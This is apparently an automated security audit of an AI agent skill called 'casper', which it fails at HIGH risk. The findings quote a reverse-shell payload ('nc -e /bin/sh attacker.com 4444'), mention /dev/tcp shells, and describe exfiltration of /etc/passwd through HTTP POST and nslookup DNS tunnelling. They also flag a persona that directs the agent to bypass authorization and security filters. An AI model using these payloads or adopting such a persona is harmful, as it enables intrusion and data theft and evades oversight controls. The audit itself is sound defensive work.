skills/drolu/agent-skills/casper/Gen Agent Trust Hub

casper

Fail

Audited by Gen Agent Trust Hub on Jul 2, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides explicit instructions and functional payloads for establishing reverse shells. Evidence found in 'casper-injection.md' and 'casper-pt-python.md' includes payloads such as '| nc -e /bin/sh attacker.com 4444' and bash redirects via '/dev/tcp' to establish remote access.
  • [COMMAND_EXECUTION]: The framework facilitates autonomous command execution across multiple environments. Scripts in 'casper-pt-python.md' utilize Python's 'eval()', 'exec()', and 'os.system()' to dynamically execute arbitrary code and system-level commands.
  • [DATA_EXFILTRATION]: The skill defines methodologies for extracting and exfiltrating sensitive data to external servers. Payload examples in 'casper-pt.md' and 'casper-injection.md' demonstrate exfiltrating system files (e.g., '/etc/passwd') and database contents via HTTP POST requests and DNS tunneling using 'nslookup'.
  • [EXTERNAL_DOWNLOADS]: Components in 'casper-pt-powershell.md' initiate the installation of over 30 external PowerShell modules from the PowerShell Gallery, such as 'PSJwt', 'PSGraphQL', and 'SecretManagement.Keeper', which introduces a large surface for supply chain attacks.
  • [PROMPT_INJECTION]: The skill mandates a 'highly autonomous, expert-level penetration tester' persona, which directs the agent to bypass standard authorization controls and security filters on target systems, potentially overriding safety protocols.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Jul 2, 2026, 07:11 PM
Security Audit — agent-trust-hub — casper